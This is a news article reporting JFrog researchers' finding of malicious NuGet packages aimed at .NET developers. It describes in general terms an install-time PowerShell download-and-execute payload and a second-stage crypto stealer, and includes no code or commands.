Threat actors have been observed using the open source package manager NuGet to craft malicious packages targeting .NET developers.
According to software package management company JFrog, the discovery would represent the first instance in the wild of packages with malicious code found in NuGet.
“For the first time, the NuGet repository – once thought to be untouched by malicious code – actually contains several harmful software packages designed to run automatically and often connected to further infected dependencies,” explained Shachar Menashe, senior director at JFrog Security Research. “This proves that no open source repository is safe from malicious actors.”
According to an advisory written by JFrog security researchers Natan Nehorai and Brian Moussalli, the packages were downloaded 150,000 times over the past month.
“[They] contained a ‘download & execute’ type of payload [...]. A PowerShell script that would execute upon installation and trigger a download of a ‘2nd stage’ payload, which could be remotely executed. The 2nd stage payload is a custom, more sophisticated executable,” wrote Nehorai and Moussalli.
The second-stage payload delivers several capabilities that include a crypto stealer, an Electron archive extractor (which also supports code execution) and an auto-updater.
In the advisory, the JFrog security experts said that upon contacting NuGet administrators, they were told the team were aware of the malicious package and had removed them.
Still, Menashe said that .NET developers are still at high risk from malicious code, considering that the observed NuGet packages still contain facilities to run code upon package installation.
“Even though the culpable malicious packages have [...] been removed, .NET developers using NuGet are still at high risk of malicious code infecting their environments,” the executive added. “[They] should take caution when curating open-source components for use in their builds – and at every step of the software development lifecycle – to ensure the software supply chain remains secure.”
For additional information about securing open source software, head over to this analysis by OpenUK CEO, Amanda Brock.